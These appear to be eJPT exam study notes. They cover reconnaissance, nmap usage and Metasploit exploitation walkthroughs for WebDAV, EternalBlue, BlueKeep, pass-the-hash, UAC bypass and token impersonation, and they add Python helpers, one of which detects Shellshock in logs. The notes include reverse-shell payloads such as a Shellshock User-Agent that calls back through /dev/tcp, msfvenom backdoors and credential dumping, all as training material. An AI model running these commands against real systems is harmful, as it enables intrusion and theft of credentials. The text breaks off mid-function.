
EJPT

Intro

Exam Format

  • 48 Hour Exam
  • 5 Machines
  • 35 Questions
  • https://medium.com/@ls5747670/my-ejptv2-experience-and-tips-2024-a91954726fc5
  • https://infosecwriteups.com/mastering-the-ejptv2-exam-ec38daec16bc
  • https://aluvi.notion.site/eJPTv2-Complete-Cheat-sheet-d5b052c525d94c89b5d41183bd5c39fd
  • https://cisofy.com/lynis/
  • https://github.com/xonoxitron/INE-eJPT-Certification-Exam-Notes-Cheat-Sheet
  • https://github.com/Nater-aide/EJPT/blob/main/Notes/Wordpress.md
  • https://github.com/miazga-git/eJPT-Study-Notes
  • https://github.com/syselement/ine-notes/blob/main/ejpt/ejpt-cheatsheet.md
  • https://github.com/Nater-aide/EJPT/blob/main/Notes/MYSQL.mdk

Assessment Methodologies

Passive Information Gathering

Website Recon & Footprinting

  • IP Addresses
    • host <domain>
  • Directories
    • robots.txt
    • sitemap.xml
  • Names
  • Emails
  • Phone Numbers
  • Physical Addresses
  • Web Technologies Used
    • BuiltWith → Firefox Addon (Recommended)
    • Wappalyzer → Extension
    • whatweb <domain> → Linux Tool
    • webhttrack → Website Copier

Whois Enumeration

  • https://who.is website
  • whois <domain>

Website Footprinting with Netcraft

  • https://netcraft.com

DNS Recon

  • dnsrecon -d <domain> → Kali Linux Tool
  • https://dnsdumpster.com/

WAF

  • wafw00f

Subdomain Enumeration

  • Sublist3r

Google Dorks

  • cache:ine.com
  • Exploit-DB Dorks

Email Harvesting

  • theHarvester

Leaked Password Databases

  • HaveIBeenPwned?

Active Information Gathering

DNS Zone Transfer

  • /etc/hosts → local name resolution (map lab hostnames to IPs here before using them in tools)
  • dnsenum <domain> → enumerates records & attempts a zone transfer (AXFR) against every nameserver it finds
  • dig axfr @<nameserver> <domain> → manual zone transfer attempt; a misconfigured server hands back the whole zone
  • fierce --domain <domain>
  • nmap --script dns-zone-transfer -p 53 <nameserver> --script-args dns-zone-transfer.domain=<domain>
  • netdiscover → ARP-based host discovery on the local segment (not a DNS tool)

Footprinting & Scanning

Active Information Gathering

Host Discovery Techniques

  • Ping Sweeps → ICMP Echo Requests (nmap -PE) → Tool: fping
    • fping -a -g 10.10.23.0/24 → -a: print only alive hosts, -g: generate the target list from the CIDR range
  • ARP Scanning → nmap -PR; Nmap's default on a local Ethernet segment. Hosts must answer ARP to talk at all, so it works even when ICMP is filtered
  • TCP SYN Ping (-PS<ports>) → SYN to the given ports; a SYN/ACK or a RST both prove the host is up (this is host discovery, not the -sS half-open port scan)
  • UDP Ping (-PU<ports>)
  • TCP ACK Ping (-PA<ports>) → unsolicited ACK; a RST reply means the host is up; passes stateless filters that only block SYN
  • SYN-ACK Ping → sends SYN/ACK packets & expects a RST back from a live host

NMAP

  • Scripts → /usr/share/nmap/scripts/
  • Firewall/IDS Evasion
    • -f → Fragments IP packets
    • -D → Decoy
  • -Pn vs -sn
    • -sn → host discovery only, no port scan → default probes are ICMP echo, TCP SYN to 443, TCP ACK to 80 & an ICMP timestamp request (plain ARP requests on a local Ethernet segment) → used to list live targets
    • -Pn → skip host discovery entirely & treat every target as up → use when ping probes are filtered (typical for Windows hosts with the firewall on); slower, because every address gets port-scanned
  • Types of Scans:
    • TCP Connect Scans (-sT)
    • SYN "Half-open" Scans (-sS)
    • UDP Scans (-sU)
    • TCP Null Scans (-sN) → sent with no flags set at all
      • As per RFC 793, the target host should respond with a RST if the port is closed & stay silent if it is open → no response is reported as open|filtered
    • TCP FIN Scans (-sF) → a request is sent with only the FIN flag (normally used to gracefully close an active connection)
      • Nmap expects a RST if the port is closed & silence (open|filtered) if it is open
    • TCP Xmas Scans (-sX) → sends a packet with FIN, PSH & URG set ("lit up like a Christmas tree") & expects a RST response for closed ports
  • If a UDP port doesn't respond to an Nmap scan, it will be marked as open|filtered (an ICMP port-unreachable reply means closed) → add -sV (-sUV) so the version probes can confirm which ones are really open
  • NULL, FIN and Xmas → Firewall Evasion: stateless filters that only match on SYN let them through; an ICMP unreachable reply marks the port filtered
  • Microsoft Windows (& many Cisco devices) → don't follow the RFC & respond to a NULL, FIN or Xmas scan with a RST for every port → every port shows as closed, so these scans tell you nothing about Windows targets; fall back to -sS / -sT
  • Zenmap topology view → the colour of a host circle reflects its number of open ports:
    • Green → fewer than three open ports
    • Yellow → three to six open ports
    • Red → more than six open ports
    • The scanning machine (localhost) sits at the centre & the other hosts are plotted around it by hop count, labelled with hostname & IP address
  • nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery

FFUF

  • You could also use any custom keyword instead of FUZZ, you just need to define it like this wordlist.txt:KEYWORD
    • ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ
  • generic list of files such as raft-medium-files-lowercase.txt
    • ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
  • To hide the progress: 2>/dev/null
  • Directories: ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
  • By adding -fc 403 (filter code) we'll hide from the output all 403 HTTP status codes.
  • -mc 200 → Only shows 200
  • -fr → Filter regexp

Audit

  • https://cisofy.com/lynis/

Penetration Testing

Windows Vulnerabilities

  • Windows IIS - Port 80, 443
  • WebDAV - Port 80, 443
  • SMB/CIFS - Port 445
  • RDP - Port 3389
  • WinRM - Port 5985 (HTTP), 5986 (HTTPS)

Exploit - WebDAV IIS

  • nmap -sV -p 80 --script=http-enum <target>
  • hydra -L <username-list> -P <password-list> <target> http-get /webdav/
  • davtest -auth user:password -url <url>
  • cadaver <url> → Enter username & password
    • put <webshell-path>
  • Webshells → /usr/share/webshells
  • dir C:/ & type C:/<filepath> → commands run through the uploaded webshell to confirm execution & read files
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp
  • service postgresql start && msfconsole
    • use multi/handler → Use to setup a listener for payload you created with msfvenom
    • set payload windows/meterpreter/reverse_tcp
    • show options
    • set LHOST & LPORT & Run

Exploit - SMB : PSExec

  • nmap -sV -sC <target>
  • auxiliary/scanner/smb/smb_login → brute-force SMB credentials (USER_FILE / PASS_FILE)
  • psexec.py Administrator@192.168.1.1 → impacket; prompts for the password
  • Usernames: /usr/share/metasploit-framework/data/wordlists/common_users.txt
  • exploit/windows/smb/psexec → set SMBUser, SMBPass & RHOSTS

Exploit - SMB : Eternal Blue(MS17-010)

  • https://github.com/3ndG4me/AutoBlue-MS17-010
  • cd Shellcode
  • ./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless → writes shellcode/sc_x86.bin & sc_x64.bin
  • nc -lvnp 1234
  • python eternalblue_exploit7.py <target IP> shellcode/sc_x64.bin → exploit7.py for Windows 7 / Server 2008 R2, exploit8.py for Windows 8 / Server 2012; pick the .bin that matches the target's architecture
  • Method 2 : Metasploit
  • use windows/smb/ms17_010_eternalblue

Exploit - RDP

  • use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDP
  • hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>
  • xfreerdp /u:<username> /p:<password> /v:<target>:<port>

Exploit - WinRM

  • Port → 5985 (HTTP), 5986 (HTTPS)
  • crackmapexec winrm <target-ip> -u <username> -p <wordlist-path> → password brute-force / spray
  • crackmapexec winrm <target> -u <username> -p <password> -x <command> → run a single command over WinRM
  • evil-winrm.rb -u <username> -p <password> -i <target> → interactive PowerShell session
  • use exploit/windows/winrm/winrm_script_exec
    • set FORCE_VBS true
    • set USERNAME & PASSWORD
    • exploit
      > use auxiliary/scanner/winrm/winrm_auth_methods
      > use auxiliary/scanner/winrm/winrm_login
      > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
      > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
      > set VERBOSE false
      
      > use auxiliary/scanner/winrm/winrm_cmd
      > set USERNAME administrator
      > set PASSWORD <password>
      > set cmd whoami
      > run
      
      > use exploit/windows/winrm/winrm_script_exec
      > set USERNAME <username>
      > set PASSWORD <password>
      > set LHOST <IP>
      > set FORCE_VBS true
      > run
      > sysinfo
      

Privilege Escalation

Windows

  • Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
    • Run systeminfo on the target & save the output to a txt file
    • ./windows-exploit-suggester.py --update → downloads the Microsoft security bulletin database (.xls)
    • ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file>
  • Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits
    • Download the specific exploit
    • Upload this exploit using Meterpreter (upload <exploit>.exe)
    • shell → .\<exploit>.exe
  • Meterpreter → getsystem → tries the built-in named-pipe impersonation techniques to escalate to SYSTEM; try it first, it's the cheapest option
  • use post/multi/recon/local_exploit_suggester → set SESSION → lists the local exploit modules the session looks vulnerable to

Exploit - UAC

  • UAC → User Account Control → Windows security feature → used to prevent unauthorized changes from being made to the OS
    • It ensures that changes to the OS require approval from an administrator, or from a user account that is part of the local Administrators group. A bypass therefore needs a session as a local admin that is still running with the medium-integrity (non-elevated) token
  • https://github.com/hfiref0x/UACME
  • net users
  • net localgroup administrators
  • use exploit/windows/http/rejetto_hfs_exec
  • pgrep explorer → PID of explorer.exe (a 64-bit process)
  • migrate <pid> → moves the session out of the x86 payload process into a 64-bit one
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe
  • upload backdoor.exe
  • upload /root/Desktop/Tools/UACME/Akagi64.exe
  • .\Akagi64.exe 23 C:\Temp\backdoor.exe → Akagi launches backdoor.exe through the chosen bypass method, so the callback arrives with a high-integrity token & getsystem then works

Enumeration

Importing Nmap results into MSF

service postgresql start
msfconsole

msf> db_status 
msf> workspace
msf> workspace -a <name> // Create a new workspace
msf> db_import <path_to_file>
msf> hosts // Check whether the data imported successfully
msf> services // Check whether the data imported successfully
msf> db_nmap -Pn -sV -O 10.4.22.173 // Runs nmap from msfconsole; results go straight into the MSF DB
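
What db_import actually pulls out of an nmap XML file is, per host, the address, hostname & OS match, and, per port, the state, service name & version. The script below is an added example (it is not part of these notes and not Metasploit's own code) that parses a constructed `nmap -oX` sample into the same hosts/services tables, so a scan can be sanity-checked before import or targets picked without msfconsole. Every address, name and version in the sample is made up.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -O -oX scan.xml` output; not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 10.4.22.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.4.22.173" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="demo.ine.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="ProFTPD" version="1.3.3c"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.7"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="filtered" reason="no-response"/>
        <service name="netbios-ssn"/>
      </port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.4.22.174" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return (hosts, services) in the shape of msfconsole's `hosts` / `services` tables."""
    hosts, services = [], []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                      # down hosts carry no service data worth keeping
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address[@addrtype='ipv6']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        name_el = host.find("hostnames/hostname")
        os_el = host.find("os/osmatch")
        hosts.append({
            "address": addr,
            "name": name_el.get("name") if name_el is not None else "",
            "os_name": os_el.get("name") if os_el is not None else "",
        })
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")
            info = " ".join(
                v for v in (svc.get("product"), svc.get("version")) if v
            ) if svc is not None else ""
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name") if svc is not None else "",
                "info": info,
            })
    return hosts, services


def open_services(services):
    """Only what you would actually attack: ports confirmed open (not filtered / open|filtered)."""
    return [s for s in services if s["state"] == "open"]


def targets_for(services, service_name):
    """host:port pairs running a given service, e.g. to feed RHOSTS for an ftp module."""
    return [f"{s['host']}:{s['port']}" for s in open_services(services)
            if s["name"] == service_name]


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in hosts:
        print(h)
    for s in open_services(services):
        print(s)
```

Point the same parser at a real `-oX` file to see exactly what a `db_import` will record; the filtered 139/tcp entry is kept with its state, which is the detail the `services` table shows and a plain `-oG` grep hides.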

Port Scanning with Auxiliary Modules

service postgresql start
msfconsole

msf> workspace -a portscan
msf> search portscan
msf> use <module_name> / <index> // scanner/portscan/tcp
msf> show options
msf> set RHOSTS 192.168.100.43 // TARGET IP
bash> curl http://<TARGET IP>/ // If HTTP is open, fingerprint the web app (here: XODA)
msf> search xoda
msf> use <index/module_name>
msf> show options
msf> set RHOSTS <TARGET IP>
msf> set TARGETURI / -> // Set the path where service is hosted
msf> exploit // It will give meterpreter session

mp> sysinfo // Target Infomation
mp> shell // Open shell session

bash> ifconfig // Identify next target address (x.x.x.x+1)
bash> exit // CTRL + C

mp> run autoroute -s <subnet> // The second network seen in ifconfig (x.x.x.0/24) -> adds a route through this session so MSF modules can reach it
mp> background // Will take this session in Background

msf> sessions // View current sessions
msf> search portscan
msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1)
msf> run 
msf> back
msf> search udp_sweep 


ERROR:
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
SOLUTION:
SET LHOST <BASE_MACHINE_IP> // Attacker IP

FTP Enumeration

msf> search type:auxiliary name:ftp
msf> use auxiliary/scanner/ftp/ftp_version
msf> use auxiliary/scanner/ftp/ftp_login
msf> set RHOSTS <IP>
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> run

msf> use auxiliary/scanner/ftp/anonymous

SMB Enumeration

msf> setg RHOSTS <IP>  // Setting a Global variable
msf> search type:auxiliary name:smb
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_enumusers
msf> info // See info about module
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set ShowFiles true
msf> use auxiliary/scanner/smb/smb_login
msf> set SMB_USER admin
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

bash> smbclient -L //<IP> -U admin   // -L: List all shares
bash> smbclient //<IP>/<share> -U admin // Replace share name

Web Server Enumeration

msf> setg RHOSTS <IP>
msf> setg RHOST <IP>
msf> search type:auxiliary name:http
msf> use auxiliary/scanner/http/http_version
msf> use auxiliary/scanner/http/http_header
msf> use auxiliary/scanner/http/robots_txt
msf> use auxiliary/scanner/http/dir_scanner
msf> use auxiliary/scanner/http/files_dir
msf> use auxiliary/scanner/http/http_login
msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials
msf> unset USERPASS_FILE
msf> run 
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
bash> echo "<username>" > user.txt // Username found by apache_userdir_enum
msf> use auxiliary/scanner/http/http_login
msf> set USER_FILE /root/user.txt

MySQL Enumeration

// MySQL - TCP Port 3306

msf> use auxiliary/scanner/mysql/mysql_version
msf> use use auxiliary/scanner/mysql/mysql_login
msf> set USERNAME root
msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run // It will bruteforce passwords

// auxiliary/admin/ -> This admin modules requires credentials

msf> use auxiliary/admin/mysql/mysql_enum
msf> set PASSWORD <password> // This module requires creds
msf> set USERNAME root
msf> run
msf> use auxiliary/admin/mysql/mysql_sql
msf> set USERNAME root
msf> set PASSWORD <password>
msf> set SQL show databases;
msf> use auxiliary/scanner/mysql/mysql_schemadump
msf> set USERNAME root
msf> set PASSWORD <password>

bash> mysql -h <IP> -u root -p

SSH Enumeration

msf> search type:auxiliary name:ssh
msf> use auxiliary/scanner/ssh/ssh_version
msf> use auxiliary/scanner/ssh/ssh_login // Password Auth
msf> use auxiliary/scanner/ssh/ssh_login_pubkey // Key-Pair Auth (KEY_PATH)
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf> sessions <number> // A successful ssh_login opens a shell session
> /bin/bash -i
bash> ls

msf> use auxiliary/scanner/ssh/ssh_enumusers
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

SMTP Enumeration

msf> search type:auxiliary name:smtp
msf> use auxiliary/scanner/smtp/smtp_version
msf> use auxiliary/scanner/smtp/smtp_enum

Vulnerability Assessment

Frequently Exploited Windows Services

  • Microsoft IIS → Port 80/443 → Web Server
  • WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server
  • SMB/CIFS → Port 445 → Network File Sharing Protocol
  • RDP → Port 3389 → Remotely authenticate & interact with Windows system
  • WinRM → Port 5985 (HTTP) / 5986 (HTTPS) → Windows remote management protocol (SOAP over HTTP)

MSF Vulnerability Scanning

bash> searchsploit "Microsoft Windows SMB"
bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
  • metasploit-autopwn
    > wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb // fetch the raw file, not the rendered GitHub page
    > mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
    > load db_autopwn (msf)
    > db_autopwn -p -t // -p: match modules by port, -t: show the matching modules
    > db_autopwn -p -t -PI 445 // restrict to port 445
    > analyze // built-in msf alternative: suggests modules for the hosts in the DB
    

MS17-010 SMB Vulnerability (EternalBlue Exploit)

  • EternalBlue → exploit for a remote code-execution bug in SMBv1 (MS17-010 / CVE-2017-0144) that lets an unauthenticated attacker execute arbitrary code as SYSTEM & gain access to a Windows system
  • Affected Versions (unpatched)
    • Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016
      > nmap -sV -p 445 -O <IP>
      > nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
      > git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
      > cd <DIR>
      > pip install -r requirements.txt
      > cd shellcode && chmod +x shell_prep.sh
      > ./shell_prep.sh // 1. Type Y 2. Enter LHOST IP 3. Enter LHOST port 4. Type 1(Regular CMD Shell) 5. Type 1 (Stageless payload) -> sc_x86.bin / sc_x64.bin
      > cd ..
      > chmod +x eternalblue_exploit7.py
      > nc -nvlp 1234
      > python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin
      
      // Method 2
      msf> search eternalblue
      msf> use exploit/windows/smb/ms17_010_eternalblue
      msf> set RHOSTS <IP>
      

BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)

  • Allows attackers to remotely execute arbitrary code & gain access to a Windows system, & consequently the network that the target system is part of (pre-authentication bug in the RDP service; affects Windows 7 / Server 2008 R2 & older)
    > sudo nmap -p 3389 <IP>
    
    msf> search BlueKeep
    msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    msf> set RHOSTS <IP>
    msf> run
    msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    msf> set RHOSTS <IP>
    msf> show targets // set TARGET to the exact OS/VM type; a wrong target or a failed run usually blue-screens the host, so never fire this blindly
    msf> exploit
    

PassTheHash Attack

bash> service postgresql start && msfconsole
msf> search badblue
msf> use exploit/windows/http/badblue_passthru
msf> set RHOSTS <IP>
msf> exploit

mp> pgrep lsass
mp> migrate <lsass PID> // lsass.exe holds the credential material kiwi reads; needs a SYSTEM session
mp> getuid
mp> load kiwi
mp> lsa_dump_sam // Local SAM: LM & NTLM hashes, incl. Administrator

msf> use exploit/windows/smb/psexec
msf> set LPORT <PORT>
msf> set RHOSTS <IP>
msf> set SMBUser Administrator
msf> set SMBPass <LMHash>:<NTLM Hash>
msf> set target Native\ upload
msf> exploit

// Method 2
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"

Shellshock (Bash CVE-2014-6271 Vulnerability)

  • Allows an attacker to execute arbitrary commands via Bash on any system that passes untrusted input into environment variables. The classic case is a CGI script on Apache (mod_cgi), which exports request headers such as User-Agent as environment variables; the attacker uses it to obtain remote access via a reverse shell.
    > nmap -sV <IP>
    > nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
    
    > Capture a request to the CGI script in Burp & replace the User-Agent header:
    > User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
    // The two echos end the CGI headers, so the command output shows up in the response body
    
    > nc -nvlp 1234
    > User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/<Kali-IP>/1234 0>&1'
    
    msf> search shellshock
    msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
    msf> set RHOSTS <IP>
    msf> set TARGETURI /gettime.cgi
    msf> exploit
    
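
Both sides of the Shellshock step above, as an added example that is not part of these notes: one function builds the raw request with the `() { :; };` prefix in User-Agent, the other runs the matching detection over Apache combined-log lines, which is what a defender would grep for after such a test. The log lines are constructed for the example; the host `demo.ine.local` and the CGI path are taken from the notes.

```python
import re

# Constructed Apache combined-log lines (not a real capture): two probes, one normal hit.
SAMPLE_ACCESS_LOG = [
    '10.10.1.5 - - [12/Mar/2024:10:11:12 +0000] "GET /gettime.cgi HTTP/1.1" 200 512 "-" '
    '"() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.10.1.9 - - [12/Mar/2024:10:11:13 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/122.0"',
    '10.10.1.5 - - [12/Mar/2024:10:11:20 +0000] "GET /gettime.cgi HTTP/1.1" 500 0 "-" '
    '"() { :;}; /bin/bash -c \'bash -i >& /dev/tcp/10.10.1.5/1234 0>&1\'"',
]

# Function-definition prefix that vulnerable Bash kept executing past the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)


def build_shellshock_request(host, uri, command):
    """Raw HTTP request with the payload in User-Agent (any header mod_cgi exports would do)."""
    # The two leading echos emit the blank line that terminates the CGI headers, so the
    # command output lands in the response body instead of being discarded by the server.
    ua = "() { :; }; echo; echo; /bin/bash -c '%s'" % command
    return (
        "GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n"
        % (uri, host, ua)
    ).encode()


def shellshock_command(header_value):
    """Return the injected command if the header value is a Shellshock payload, else None."""
    m = SHELLSHOCK_RE.search(header_value)
    return m.group("cmd").strip() if m else None


def scan_access_log(lines):
    """Detection: flag every request whose User-Agent carries the '() {' function prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = shellshock_command(m.group("ua"))
        if cmd:
            hits.append({"ip": m.group("ip"), "uri": m.group("uri"),
                         "status": int(m.group("status")), "command": cmd})
    return hits


if __name__ == "__main__":
    print(build_shellshock_request("demo.ine.local", "/gettime.cgi", "id").decode())
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
```

The 500 on the second probe is typical for the reverse-shell variant: the command never returns, so the CGI produces no headers, and the failed request is the only trace in the web log while the shell itself lives on in a separate process.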

Vulnerability Scanning

Nessus

sudo dpkg -i Nessus.deb // Download from Nessus Website
sudo systemctl start nessusd.service

WMAP

msf> setg RHOSTS <IP>
msf> load wmap
msf> wmap_sites -a <IP>
msf> wmap_targets -t http://<IP>
msf> wmap_sites -l
msf> wmap_targets -l
msf> wmap_run -t // list the modules that would run against the target
msf> wmap_run -e // execute them
msf> wmap_vulns -l // list the findings

Windows Privilege Escalation

Windows Kernel Exploits

  • Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits
    mp> getsystem // Meterpreter: try the built-in escalation techniques first
    msf> use post/multi/recon/local_exploit_suggester
    msf> set SESSION <Number>
    msf> run
    

Bypassing User Account Control (UAC)

  • In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system.
  • UACMe: https://github.com/hfiref0x/UACME
    > net users
    > net localgroup administrators // our user must be a member
    > setg RHOSTS <IP>
    > search rejetto
    > use exploit/windows/http/rejetto_hfs_exec
    > run
    > sysinfo // 32-bit mp session
    > pgrep explorer
    > migrate <ID>
    > sysinfo // 64-bit mp session
    > shell
    > net user
    > net localgroup administrators
    
    // MSF : listener for the payload UACME will launch
    > use multi/handler
    > set payload windows/meterpreter/reverse_tcp
    > set LHOST <IP>
    > set LPORT <Port>
    > run
    
    // Create Payload
    > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o backdoor.exe
    
    // Continue Previous Session
    > pwd
    > getuid
    > getprivs // before the bypass: the reduced privilege set of a medium-integrity token
    > cd C:\\
    > mkdir temp
    > cd temp
    > upload backdoor.exe
    > upload /root/Desktop/tools/UACME/Akagi64.exe
    > shell
    > dir
    > Akagi64.exe 23 C:\temp\backdoor.exe // method 23 launches backdoor.exe elevated
    
    backdoor.exe connects back to the listener with a high-integrity token
    
    > getuid
    > getprivs // now the full administrative privilege set
    > getsystem
    > hashdump
    

Access Control Impersonation

  • Windows Access Tokens: identify & describe the security context of a process or thread running on a system (user SID, group SIDs, privileges, integrity level).
  • Access tokens are generated by the Local Security Authority through winlogon.exe every time a user authenticates successfully & include the identity & privileges of the user account associated with the thread or process. Impersonation works because a copy of that token stays in memory for as long as that user's processes run.
  • Privileges:
    • SeAssignPrimaryTokenPrivilege: lets a process assign a primary token (e.g. one obtained by impersonation) to a new process.
    • SeCreateTokenPrivilege: lets a user create an arbitrary token, including one with administrative privileges.
    • SeImpersonatePrivilege: lets a process impersonate another user's token after authentication, & so create a process under that user's security context, typically an administrative one. Service accounts (IIS, MSSQL) usually hold it, which is why it is the usual starting point for the "potato" family of escalations.
      > nmap <IP>
      > search rejetto
      > set RHOSTS <IP>
      > exploit
      > sysinfo
      > pgrep explorer
      > migrate <ID>
      > getuid
      > getprivs // SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege present?
      > load incognito
      > list_tokens -u // delegation tokens can be used for anything, impersonation tokens only for local actions
      > impersonate_token <Name> // e.g. "DOMAIN\Administrator" (the backslash may need doubling)
      > getuid
      > pgrep explorer
      > migrate <ID>
      

Alternate Data Streams (ADS)

  • ADS (Alternate Data Streams) is an NTFS file attribute that was designed to provide compatibility with the Macintosh HFS, which stores a data fork & a resource fork per file
  • Any file created on an NTFS drive will have two different forks/streams:
    • Data Stream → default, unnamed stream ($DATA) that contains the contents of the file
    • Resource Stream → named stream that typically contains metadata of the file
  • Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection: the hidden stream shows neither in a plain dir listing nor in the reported file size. List streams with dir /R or PowerShell's Get-Item -Stream *

Unattended Windows Setup

  • Config Files:
    • C:\Windows\Panther\Unattend.xml
    • C:\Windows\Panther\Autounattend.xml
      > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe
      > python3 -m http.server 80
      
      // Windows
      > cd Desktop
      > certutil -urlcache -f http://<Kali>/payload.exe payload.exe
      > msfconsole
      > use multi/handler
      > set payload windows/x64/meterpreter/reverse_tcp
      > set LHOST <IP>
      > set LPORT 1234
      > run
      
      // Execute the payload in Windows
      
      > search -f unattend.xml
      > cd C:\\Windows\\Panther
      > download unattend.xml
      > vim password.txt // paste the base64 <Value> of the <Password> element
      > base64 -d password.txt | iconv -f UTF-16LE // the value is UTF-16LE & normally has the word "Password" appended to the real password
      > psexec.py Administrator@<IP> // Enter password
      
      // Windows: runas.exe /user:Administrator cmd // Enter password
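
The decoding step is where this lab usually trips people up: Windows System Image Manager stores a non-plaintext unattend password as base64 over the UTF-16LE encoding of the password with the element name ("Password", or "AdministratorPassword" for the UserAccounts entry) appended, so a bare `base64 -d` prints NUL-spaced text with a stray suffix. The script below is an added example (not from these notes, not a Microsoft tool) that walks an Unattend.xml, decodes every password it finds and pairs it with the account name. The sample XML and both credentials are constructed for the example.

```python
import base64
import xml.etree.ElementTree as ET


def encode_unattend_password(password: str, suffix: str = "Password") -> str:
    """How a non-plaintext unattend password is stored: base64(UTF-16LE(password + suffix))."""
    return base64.b64encode((password + suffix).encode("utf-16le")).decode("ascii")


def decode_unattend_password(value: str, suffix: str = "Password") -> str:
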